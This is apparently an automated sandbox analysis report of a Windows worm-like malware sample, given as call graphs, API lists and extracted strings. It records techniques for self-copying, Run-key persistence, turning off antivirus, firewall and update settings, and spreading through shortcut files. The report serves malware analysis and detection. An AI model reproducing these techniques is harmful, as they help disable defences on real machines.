5975 401aa1 LeaveCriticalSection GetTickCount 5973->5975 5976 401a5f InterlockedExchangeAdd 5973->5976 5974 401992 accept 5974->5966 5974->5979 5975->5972 6023 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5976->6023 5977->5972 5979->5966 5979->5974 5984 401cf0 7 API calls 5979->5984 5985 4022c0 5979->5985 5983 401a72 5983->5975 5983->5976 6024 40aff0 shutdown closesocket 5983->6024 5984->5966 5986 4022d2 EnterCriticalSection 5985->5986 5987 4022cd 5985->5987 5988 4022e7 5986->5988 5989 4022fd LeaveCriticalSection 5986->5989 5987->5979 5988->5989 5990 402308 5989->5990 5991 40230f 5989->5991 5990->5979 5992 40a240 7 API calls 5991->5992 5993 402319 5992->5993 5994 402326 getpeername CreateIoCompletionPort 5993->5994 5995 4023b8 5993->5995 5996 4023b2 5994->5996 5997 402366 5994->5997 6027 40aff0 shutdown closesocket 5995->6027 6001 40a660 _invalid_parameter 3 API calls 5996->6001 6025 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5997->6025 5999 4023c3 5999->5979 6001->5995 6002 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6026 4021e0 EnterCriticalSection LeaveCriticalSection 6002->6026 6004 4023ab 6004->5979 6006 40190f 6005->6006 6007 401830 6005->6007 6006->5971 6007->6006 6008 40183d InterlockedExchangeAdd 6007->6008 6008->6006 6014 401854 6008->6014 6009 401880 6010 401891 6009->6010 6037 40aff0 shutdown closesocket 6009->6037 6011 4018a7 InterlockedDecrement 6010->6011 6015 401901 6010->6015 6011->6015 6014->6006 6014->6009 6028 4017a0 EnterCriticalSection 6014->6028 6016 402247 6015->6016 6017 402265 EnterCriticalSection 6015->6017 6016->5971 6018 40229c LeaveCriticalSection DeleteCriticalSection 6017->6018 6020 40227d 6017->6020 6019 40a660 _invalid_parameter 3 API calls 6018->6019 6019->6016 6021 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6020->6021 6022 40229b 6020->6022 6021->6020 6022->6018 6023->5983 6024->5983 6025->6002 6026->6004 6027->5999 6029 401807 LeaveCriticalSection 6028->6029 6030 4017ba InterlockedExchangeAdd 6028->6030 6029->6014 6031 4017ca LeaveCriticalSection 6030->6031 6032 4017d9 6030->6032 6031->6014 6033 40a660 _invalid_parameter 3 API calls 6032->6033 6034 4017fe 6033->6034 6035 40a660 _invalid_parameter 3 API calls 6034->6035 6036 401804 6035->6036 6036->6029 6037->6010 5695 405fe5 5697 405f5e 5695->5697 5696 405fea LeaveCriticalSection 5697->5696 5698 40a6d0 8 API calls 5697->5698 5699 405fbc 5698->5699 5699->5696 6038 406ba6 6041 406b88 6038->6041 6039 406cc8 Sleep 6039->6041 6040 406bb9 6042 406260 4 API calls 6040->6042 6041->6039 6041->6040 6043 406cd8 ExitThread 6041->6043 6046 406340 4 API calls 6041->6046 6045 406bca 6042->6045 6044 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6048 406c66 wsprintfW 6044->6048 6049 406c7b wsprintfW 6044->6049 6045->6044 6047 406beb 6045->6047 6046->6041 6048->6049 6050 406650 51 API calls 6049->6050 6050->6047 6051 40d3b0 6057 4021b0 6051->6057 6054 40d3ef 6055 40d3d5 WaitForSingleObject 6061 401600 6055->6061 6058 4021cf 6057->6058 6059 4021bb 6057->6059 6058->6054 6058->6055 6059->6058 6082 402020 6059->6082 6062 401737 6061->6062 6063 40160d 6061->6063 6062->6054 6063->6062 6064 401619 EnterCriticalSection 6063->6064 6065 401630 6064->6065 6066 4016b5 LeaveCriticalSection SetEvent 6064->6066 6065->6066 6071 401641 InterlockedDecrement 6065->6071 6073 40165a InterlockedExchangeAdd 6065->6073 6080 4016a0 InterlockedDecrement 6065->6080 6067 4016d0 6066->6067 6068 4016e8 6066->6068 6069 4016d6 PostQueuedCompletionStatus 6067->6069 6070 40d780 11 API calls 6068->6070 6069->6068 6069->6069 6072 4016f3 6070->6072 6071->6065 6074 40d8c0 7 API calls 6072->6074 6073->6065 6075 40166d InterlockedIncrement 6073->6075 6076 4016fc CloseHandle CloseHandle WSACloseEvent 6074->6076 6077 401c50 4 API calls 6075->6077 6103 40aff0 shutdown closesocket 6076->6103 6077->6065 6079 401724 DeleteCriticalSection 6081 40a660 _invalid_parameter 3 API calls 6079->6081 6080->6065 6081->6062 6083 40a240 7 API calls 6082->6083 6084 40202b 6083->6084 6085 402038 GetSystemInfo InitializeCriticalSection CreateEventA 6084->6085 6086 4021a5 6084->6086 6087 402076 CreateIoCompletionPort 6085->6087 6088 40219f 6085->6088 6086->6058 6087->6088 6089 40208f 6087->6089 6090 401600 36 API calls 6088->6090 6091 40d5e0 8 API calls 6089->6091 6090->6086 6092 402094 6091->6092 6092->6088 6093 40209f WSASocketA 6092->6093 6093->6088 6094 4020bd setsockopt htons bind 6093->6094 6094->6088 6095 402126 listen 6094->6095 6095->6088 6096 40213a WSACreateEvent 6095->6096 6096->6088 6097 402147 WSAEventSelect 6096->6097 6097->6088 6098 402159 6097->6098 6099 40217f 6098->6099 6100 40d610 17 API calls 6098->6100 6101 40d610 17 API calls 6099->6101 6100->6098 6102 402194 6101->6102 6102->6058 6103->6079 5714 4074f1 ExitThread 5715 407ff9 5716 408002 5715->5716 5717 408011 34 API calls 5716->5717 5718 408e46 5716->5718 6116 40a73e 6117 40a660 _invalid_parameter 3 API calls 6116->6117 6120 40a6fd 6117->6120 6118 40a712 6119 40a450 _invalid_parameter 7 API calls 6119->6120 6120->6118 6120->6119 6121 40a714 memcpy 6120->6121 6121->6120

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ebe0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 14 4075f0-4075f2 ExitProcess 3->14 15 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407902-407922 RegOpenKeyExW 4->5 6 4078d6-4078fc RegSetValueExA RegCloseKey 4->6 8 407924-407950 RegSetValueExA RegCloseKey 5->8 9 407955-407975 RegOpenKeyExW 5->9 6->5 11 4079fa-407a1a RegOpenKeyExW 8->11 12 407977-4079a6 RegCreateKeyExW RegCloseKey 9->12 13 4079ac-4079cc RegOpenKeyExW 9->13 17 407a1c-407a48 RegSetValueExA RegCloseKey 11->17 18 407a4d-407a6d RegOpenKeyExW 11->18 12->13 13->11 16 4079ce-4079f4 RegSetValueExA RegCloseKey 13->16 19 40764c-40767b SetFileAttributesW RegOpenKeyExW 15->19 20 4076de-407720 Sleep wsprintfW CopyFileW 15->20 16->11 23 407b49-407b69 RegOpenKeyExW 17->23 24 407aa4-407ac4 RegOpenKeyExW 18->24 25 407a6f-407a9e RegCreateKeyExW RegCloseKey 18->25 19->20 26 40767d-4076b0 wcslen RegSetValueExW 19->26 21 407726-407755 SetFileAttributesW RegOpenKeyExW 20->21 22 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 20->22 21->22 29 407757-40778a wcslen RegSetValueExW 21->29 22->4 30 407817-407846 SetFileAttributesW RegOpenKeyExW 22->30 27 407b97-407bb7 RegOpenKeyExW 23->27 28 407b6b-407b91 RegSetValueExA RegCloseKey 23->28 31 407ac6-407af5 RegCreateKeyExW RegCloseKey 24->31 32 407afb-407b1b RegOpenKeyExW 24->32 25->24 26->20 33 4076b2-4076d4 RegCloseKey call 40ee30 26->33 34 407be5-407c05 RegOpenKeyExA 27->34 35 407bb9-407bdf RegSetValueExA RegCloseKey 27->35 28->27 29->22 36 40778c-4077ae RegCloseKey call 40ee30 29->36 30->4 37 407848-40787b wcslen RegSetValueExW 30->37 31->32 32->23 38 407b1d-407b43 RegSetValueExA RegCloseKey 32->38 33->20 45 4076d6-4076d8 ExitProcess 33->45 40 407cf1-407d11 RegOpenKeyExA 34->40 41 407c0b-407ceb RegSetValueExA * 7 RegCloseKey 34->41 35->34 36->22 50 4077b0-4077b2 ExitProcess 36->50 37->4 43 40787d-40789f RegCloseKey call 40ee30 37->43 38->23 46 407d17-407df7 RegSetValueExA * 7 RegCloseKey 40->46 47 407dfd-407e12 Sleep call 40cc80 40->47 41->40 43->4 54 4078a1-4078a3 ExitProcess 43->54 46->47 55 407f87-407f90 47->55 56 407e18-407f84 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40daf0 call 406f70 CreateEventA call 40c3b0 call 40d5e0 call 40b770 call 40d610 * 4 call 40d780 call 40d8c0 47->56 56->55
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041AA40,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(0041AA40), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNEL32(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-2348032744
                                                                                • Opcode ID: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
                                                                                • Opcode Fuzzy Hash: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 83 406650-406665 _chkstk 84 406667-406669 83->84 85 40666e-406720 wsprintfW * 5 PathFileExistsW 83->85 86 406b48-406b4b 84->86 87 406722-406743 call 40ec20 85->87 88 406764-406773 PathFileExistsW 85->88 87->88 97 406745-40675e SetFileAttributesW DeleteFileW 87->97 89 406803-406812 PathFileExistsW 88->89 90 406779-4067a7 SetFileAttributesW DeleteFileW PathFileExistsW 88->90 94 406814-40681a 89->94 95 406859-40687a FindFirstFileW 89->95 92 4067a9-4067ba CreateDirectoryW 90->92 93 4067cb-4067da PathFileExistsW 90->93 92->93 100 4067bc-4067c5 SetFileAttributesW 92->100 93->89 101 4067dc-4067f2 CopyFileW 93->101 102 406834-406847 call 406400 94->102 103 40681c-406832 call 406400 94->103 98 406880-406938 95->98 99 406b42 95->99 97->88 104 406942-406956 lstrcmpW 98->104 99->86 100->93 101->89 105 4067f4-4067fd SetFileAttributesW 101->105 112 40684a-406853 SetFileAttributesW 102->112 103->112 108 406958-40696c lstrcmpW 104->108 109 40696e 104->109 105->89 108->109 113 406973-406984 108->113 114 406b19-406b2f FindNextFileW 109->114 112->95 115 406995-40699c 113->115 114->104 116 406b35-406b3c FindClose 114->116 117 4069ca-4069d3 115->117 118 40699e-4069bb lstrcmpiW 115->118 116->99 121 4069d5 117->121 122 4069da-4069eb 117->122 119 4069bd 118->119 120 4069bf-4069c6 118->120 119->115 120->117 121->114 124 4069fc-406a03 122->124 125 406a73-406a7c 124->125 126 406a05-406a22 PathMatchSpecW 124->126 129 406a83-406a92 PathFileExistsW 125->129 130 406a7e 125->130 127 406a24 126->127 128 406a26-406a6c wsprintfW SetFileAttributesW DeleteFileW 126->128 127->124 128->125 132 406a94 129->132 133 406a99-406ae9 wsprintfW * 2 129->133 130->114 132->114 134 406b03-406b13 MoveFileExW 133->134 135 406aeb-406b01 call 406510 133->135 134->114 135->114
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(0041A428,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-3454820331
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 688 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 689 406565-406579 lstrcmpW 688->689 690 40663f-406642 688->690 691 406591 689->691 692 40657b-40658f lstrcmpW 689->692 694 40660c-406622 FindNextFileW 691->694 692->691 693 406593-4065dc wsprintfW * 2 692->693 695 4065f6-406606 MoveFileExW 693->695 696 4065de-4065f4 call 406510 693->696 694->689 697 406628-406639 FindClose RemoveDirectoryW 694->697 695->694 696->694 697->690
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
                                                                                • htons.WS2_32(?), ref: 00402101
                                                                                • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D610: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1603358586-0
                                                                                • Opcode ID: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
                                                                                • Opcode Fuzzy Hash: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                • htons.WS2_32(0000076C), ref: 0040DC10
                                                                                • inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                • bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                • lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                • sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                  • Part of subcall function 0040DD40: Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                • String ID: 239.255.255.250
                                                                                • API String ID: 726339449-2186272203
                                                                                • Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
                                                                                • Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                • htons.WS2_32(?), ref: 00401508
                                                                                • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                • String ID:
                                                                                • API String ID: 4174406920-0
                                                                                • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
                                                                                • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040D1B2
                                                                                • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
                                                                                • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
                                                                                • GetTickCount.KERNEL32 ref: 0040D224
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D244
                                                                                • GetTickCount.KERNEL32 ref: 0040D24A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleepioctlsocketrecv
                                                                                • String ID:
                                                                                • API String ID: 107502007-0
                                                                                • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
                                                                                • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
                                                                                APIs
                                                                                • htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
